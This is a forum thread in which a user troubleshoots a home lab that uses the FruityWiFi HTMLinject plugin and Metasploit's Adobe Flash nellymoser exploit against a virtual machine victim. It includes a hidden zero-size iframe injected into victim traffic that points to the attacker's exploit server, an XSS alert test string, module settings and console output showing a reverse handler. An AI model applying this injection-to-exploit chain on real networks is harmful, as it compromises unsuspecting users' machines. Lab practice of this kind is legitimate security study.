Post by xtr4nge on Aug 8, 2015 9:49:11 GMT
--
Post by m3m0r3x on Nov 15, 2015 22:18:11 GMT
Hi xtr4nge,

I have just made some tests with the FruityProxy plugins. I have also tested URLSnarf and BDFProxy (which by the way is really awesome) and they both work pretty well. But I have tried this plugin (HTMLinject) and I can't get any nice results. I believe my problem is some kind of routing problem.

But first I want to explain my lab to you. The whole infrastructure is in a VPN environment.

I have my attacker PC running Kali and MSF: 10.8.0.6
I have the FruityWiFi Pi: 10.8.0.10
I have a VPS: 10.0.0.1 (gateway to the internet and connection point for my attacker PC)
And I have the victim (which is set up in VirtualBox), getting the IP 10.0.0.68 from Karma

This exact same setup works fine for the BDFProxy plugin. Even the example [ <script>alert('Fruits of DOOM ')</script> ] works fine.

I set up the exploit as follows:

    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
    Retries  true             no        Allow the browser to retry the module
    SRVHOST  10.8.0.6         yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
    SRVPORT  8080             yes       The local port to listen on.
    SSL      false            no        Negotiate SSL for incoming connections
    SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
    URIPATH  demo             no        The URI to use for this exploit (default is random)

and in the inject.txt I wrote down:

    <iframe src='http://10.8.0.6:8080/demo' width='0' height='0' tabindex='1'></iframe>

But when I browse a webpage I can see (I also see it in Wireshark) that the browser is connecting to http://10.8.0.6:8080/demo and gets back a "http 303" (moved).

But in Metasploit I get:

    msf exploit(adobe_flash_nellymoser_bof) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.178.47:4444
    msf exploit(adobe_flash_nellymoser_bof) >
    [*] Using URL: http://10.8.0.6:8080/demo
    [*] Server started.
    [*] 10.8.0.10 adobe_flash_nellymoser_bof - Gathering target information.
    [*] 10.8.0.10 adobe_flash_nellymoser_bof - Sending HTML response.
    [!] 10.8.0.10 adobe_flash_nellymoser_bof - Exploit requirement(s) not met: flash. For more info: http://r-7.co/PVbcgx

The point that confuses me is that I get an error from 10.8.0.10 that I do not have the correct Adobe version. 10.8.0.10 is the Raspberry with FruityWiFi installed, but the victim is 10.0.0.68, connected to the FruityWiFi Pi. On the victim (10.0.0.68) I have installed Adobe Flash Player version 18.0.0.160, which is required.

Do I have to install Flash on the FruityWiFi Raspberry, too? Or do I just have to set an IPTables rule due to faulty routing?

Greetings and thanks in advance
m3m
Post by m3m0r3x on Nov 17, 2015 19:12:15 GMT
And again fail in reading. I tested the module with the correct exploit and the correct settings. But I used the wrong target OS, respectively the wrong architecture. I tested under x64 the first time. Today I tested the module (with the nellymoser exploit) under the correct architecture as it is written in the exploit info: Windows 7 x86.
Damn it.
By the way this module is awesome.
Greetings
M3m
Post by xtr4nge on Nov 20, 2015 9:02:14 GMT
Hi m3m0r3x,
Sorry for the delay in my response.
Cool, glad that you solved the problem.
I will try to add new plugins and more options as soon as I can.
Regards,